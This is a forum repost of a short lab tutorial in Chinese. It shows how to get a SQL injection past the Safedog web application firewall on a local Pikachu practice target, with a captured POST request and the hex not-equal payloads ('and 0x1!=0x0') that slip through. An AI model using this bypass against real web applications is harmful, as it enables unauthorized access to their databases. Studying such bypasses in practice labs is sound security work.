设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 技术转载 WAF绕过 -- and判断
返回列表 发新帖
查看: 2241|回复: 0

WAF绕过 -- and判断

[复制链接]
Meng0f

251

主题

270

帖子

1797

积分

金牌会员

Rank: 6Rank: 6

积分
1797
发表于 2022-1-29 10:36:07 | 显示全部楼层 |阅读模式
本帖最后由 Meng0f 于 2022-1-29 10:37 编辑

WAF绕过 -- and判断
转载于: yushao web安全工具库 2022-01-29 00:00
​一、环境
  1. <p>1、Pikachu靶机</p>

  3. <p>2、安全狗最新版</p>
复制代码



二、BurpSuite2022抓包,点击获取下载地址
1、正常访问结果

2、抓取POST包,并修改,加入and 1=1,提示被拦截

  2. POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1
  3. Host: localhost
  4. Content-Length: 21
  5. Cache-Control: max-age=0
  6. sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
  7. sec-ch-ua-mobile: ?0
  8. sec-ch-ua-platform: "Windows"
  9. Upgrade-Insecure-Requests: 1
  10. Origin: http://localhost
  11. Content-Type: application/x-www-form-urlencoded
  12. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
  13. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  14. Sec-Fetch-Site: same-origin
  15. Sec-Fetch-Mode: navigate
  16. Sec-Fetch-User: ?1
  17. Sec-Fetch-Dest: document
  18. Referer: http://localhost/pikachu/vul/sqli/sqli_id.php
  19. Accept-Encoding: gzip, deflate
  20. Accept-Language: zh-CN,zh;q=0.9
  21. Cookie: PHPSESSID=vm1gpr93kn5nat0e23qft4tsg7
  22. Connection: close

  24. id=1 and 1=1&submit=1
复制代码


3、将and 1=1修改为and 0x1!=0x1肯定不成立,返回不存在,再修改为and 0x1!=0x0,返回用户名,说明“十六进制+不等于”可以绕过该WAF。


回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-4-23 23:50 , Processed in 0.012290 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表